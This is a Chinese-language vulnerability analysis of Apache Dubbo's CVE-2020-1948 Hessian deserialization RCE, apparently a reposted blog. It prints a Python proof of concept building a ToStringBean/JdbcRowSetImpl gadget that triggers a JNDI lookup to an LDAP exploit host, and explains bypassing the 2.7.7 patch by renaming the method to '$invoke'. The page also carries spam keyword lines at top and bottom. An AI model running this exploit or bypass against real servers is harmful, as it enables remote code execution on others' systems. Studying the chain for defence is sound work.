91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析

發布時間:2021-12-22 23:41:06 來源:億速云 閱讀:185 作者:柒染 欄目:網絡管理

這篇文章將為大家詳細講解有關如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

Apache Dubbo簡介

Dubbo是一個分布式服務框架,致力于提供高性能和透明化的RPC遠程服務調用方案,以及SOA服務治理方案。簡單的說,dubbo就是個服務框架,如果沒有分布式的需求,其實是不需要用的,只有在分布式的時候,才有dubbo這樣的分布式服務框架的需求,并且本質上是個服務調用的東東,說白了就是個遠程服務調用的分布式框架(告別Web Service模式中的WSdl,以服務者與消費者的方式在dubbo上注冊) 其核心部分包含:

  • 遠程通訊: 提供對多種基于長連接的NIO框架抽象封裝,包括多種線程模型,序列化,以及“請求-響應”模式的信息交換方式。

  • 集群容錯: 提供基于接口方法的透明遠程過程調用,包括多協議支持,以及軟負載均衡,失敗容錯,地址路由,動態配置等集群支持。

  • 自動發現: 基于注冊中心目錄服務,使服務消費方能動態的查找服務提供方,使地址透明,使服務提供方可以平滑增加或減少機器。

下圖是來自Apache dubbo 官網的工作流程和原理

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析

  • Provider

    • 暴露服務方稱之為“服務提供者”

  • Consumer

    • 調用遠程服務方稱之為“服務消費者”

  • Registry

    • 服務注冊與發現的中心目錄服務稱之為“服務注冊中心”

  • Monitor

    • 統計服務的調用次調和調用時間的日志服務稱之為“服務監控中心”

  • Container

    • 服務運行容器。

Provider將本地提供的遠程方法在注冊中心進行注冊,Consumer需要調用時會先去注冊中心進行查詢,根據注冊中心返回的結果再去對應的Provider中調用對應的遠程方法,如果有變更,注冊中心將基于長連接推送變更數據給Consumer 。

啟動注冊中心,Apache dubbo 推薦使用的注冊中心時Apache ZooKeeper注冊中心 下載地址https://zookeeper.apache.org/releases.html

啟動ZooKeeper之前可以自定義修改 “/conf/zoo.cfg”配置文件里的 clientPort和dataDir的值。

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析

Apache Dubbo有一個web端的管理界面 github地址如下https://github.com/apache/dubbo-admin

下載完成后進入/dubbo-admin-server/src/main/resources目錄修改application.properties配置文件,將其中的注冊中心地址修改為自己啟動的注冊中心的地址

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析dubbo-admin-server 目錄下運行 mvn package -Dmaven.test.skip=true 將該模塊打包成jar包

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析

然后 java -jar dubbo-admin-server-0.2.0-SNAPSHOT.jar 啟動dubbo-admin-server,此時啟動了 dubbo管理的服務端但是沒有UI界面。

進入到 dubbo-admin-ui 中 執行 npm install 該命令執行完成后 執行npm run dev 。

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析訪問http://localhost:8081 此時就有了UI界面,默認賬號密碼都是root,在服務查詢中 我們可以看到Provider在Zookeeper注冊中心中注冊的遠程方法服務,目前沒有注冊所以無可用數據。

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析啟動我們使用dubbo框架寫的程序

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析可以看到我們的遠程方法服務成功在zookeeper注冊中心進行注冊

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析

CVE-2020-1948 深度分析

首先觀察一下網上已經公布的POC的代碼

from hessian2 import new_object
from client import DubboClient

client = DubboClient('127.0.0.1', 20880)

JdbcRowSetImpl=new_object(
      'com.sun.rowset.JdbcRowSetImpl',
      dataSource="ldap://127.0.0.1:8087/ExploitMac",
      strMatchColumns=["fxx"]
      )
JdbcRowSetImplClass=new_object(
      'java.lang.Class',
      name="com.sun.rowset.JdbcRowSetImpl",
      )
toStringBean=new_object(
      'com.rometools.rome.feed.impl.ToStringBean',
      beanClass=JdbcRowSetImplClass,
      obj=JdbcRowSetImpl
      )

resp = client.send_request_and_return_response(
    service_name='com.example.provider.service.UesrService',
    method_name='test',
    args=[toStringBean])

不難看出,該漏洞利用鏈最終是通過JdbcRowSetImpl調用jndi來進行遠程代碼執行。同時我們發現該gadget中用到了com.rometools.rome.feed.impl.ToStringBean,所以Provider的pom.xml中需要添加rometools的引用

<dependency><groupId>com.rometools</groupId><artifactId>rome</artifactId><version>1.7.0</version>
</dependency>

通過wireshark抓包來看一下 POC發出的報文內容

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析我們將斷點打在 org.apache.dubbo.remoting.transport.DecodeHandler 的第57行代碼上。

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析跟進該方法后可以看到該方法內首先會進行一個if判斷,判斷完成后會調用DecodeableRpcInvocation.decode()方法并傳遞進去兩個參數,其中有一個inputStream參數,我們詳細看一下該參數的內容

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析

可以看到正是我們通過POC發送的序列化數據

跟進該方法,在第131行代碼處有一個if判斷,這里通過RefctUtils.desc2classArray()處理完desc參數然后返回一個ToStringBean的類對象。

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析緊接著通過Hessian將ToStringBean的類對象反序列化成ToStringBean對象并賦值給args參數

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析仔細觀察一下此時args指向的ToStringBean對象的詳細內容,可見此時ToStringBean對象有兩個屬性已經被賦值為JdbcRowSetImpl。

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析

當前方法執行完成后 args參數和pts參數分別被賦值給當前對象的arguments屬性和parameterTypes屬性,然后當前DecodeableRpcInvocation作為參數進行返回

返回到DecodeHandler中,在第51行代碼中傳入的message參數是一個Request對象,該Request對象是dubbo的包中的,簡單看一下該對象的詳細信息

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析跟進該方法,然后繼續跟進handleRequest()方法。

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析在DubboProtocol類的第263行代碼中經過一個if判斷然后判斷成功會拋出一個RemotingException,關鍵點就在這里,可以看到傳入的參數中采用了字符串拼接的形式,當使用字符串拼接的時候,會自動調用StringBuilder的對象的append方法,依次處理channel.getRemoteAddress()的返回值,channel.getLocalAddress()的返回值,getInvocationWithoutData(inv)的返回值,而getInvocationWithoutData(inv)的返回值正式含有惡意請求的DecodeableRpcInvocation對象,StringBuilder要調用DecodeableRpcInvocation的toString方法將其轉化為字符串

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析DecodeableRpcInvocation類的父類RpcInvocation重寫了toString方法,看一下RpcInvocation.toString()方法的實現

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析

同樣還是字符串拼接,其中Arrays.toString(arguments),agruments正是之前封裝進DecodeableRpcInvocation對象中的ToStringBean對象。接下來自然會調用ToStringBean.toString()方法。

ToStringBean.toString()方法,執行時取出其中的obj屬性獲取其類名稱,并作為參數傳入另一個重寫的toString方法

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析該toString方法中會通過反射不斷調用JdbcRowSetImpl對象的各個方法,當反射調用JdbcRowSetImpl對象的getDatabaseMetaData方法時,會觸發JDNI遠程訪問dataSource

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析我們可以看到dataSource的值

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析至此Apache dubbo (CVE-2020-1948) 反序列化遠程代碼執行漏洞原理分析完畢

補丁繞過分析

這次針對該漏洞的補丁非常簡單,在分析該漏洞時說過在DecodeableRpcInvocation類的第131行有一個if 判斷,以下是2.7.6版本中該判斷的代碼

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析

更新后的2.7.7版本該判斷的代碼如下,可見在該判斷內有增加了一個if 判斷,且新增加的判斷如果判斷失敗則會拋出IllegalArgumentException異常終止當前線程的執行。

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析

那么如何繞過該判斷讓程序繼續執行下去從而觸發遠程代碼執行,我們跟入RpcUtils.isGenericCall()方法中來仔細觀察。

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析

不難發現該方法內用僅僅只用String.equals方法對比了method參數是否和$INVOKE常量或者$INVOKE_ASYNC常量的值相同。

我門看一下兩個常量的值

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析我們此時 method的值為“test”可見并不相同,緊接著進入RpcUtils.isEcho()方法,同樣是和常量進行對比,顯然結果也不相同

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析

所以if 判斷內的最終結果為true,從而拋出異常終止執行。繞過的方法相比大家也都想到了,我們只要讓method的值等于“$invoke”,“$invokeAsync”,“$echo”任意一個即可繞過。我們返回POC中查看與method對應的值是哪一個

如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析

一眼就能發現其中的method_name就是我們要找的,我們只需要修改‘test’為‘$invoke’即可對當前補丁進行繞過。

此次漏洞是序列化傳輸到后臺的數據被翻序列化完成后,在后續的處理過程中的一個異常處理中進行了危險操作,從而觸發了gadget。

關于如何進行Apache dubbo 反序列化遠程代碼執行漏洞及其補丁繞過深度分析就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

平塘县| 昭平县| 常州市| 双城市| 武宣县| 贵溪市| 通化市| 沭阳县| 融水| 徐闻县| 疏附县| 三门峡市| 延安市| 怀仁县| 信丰县| 兴和县| 壶关县| 靖边县| 江华| 张家口市| 阜宁县| 泉州市| 宜春市| 麻城市| 阳谷县| 广汉市| 射洪县| 洞头县| 任丘市| 日土县| 周口市| 三河市| 剑川县| 湖南省| 绍兴县| 墨脱县| 福鼎市| 汉源县| 密云县| 辉南县| 类乌齐县|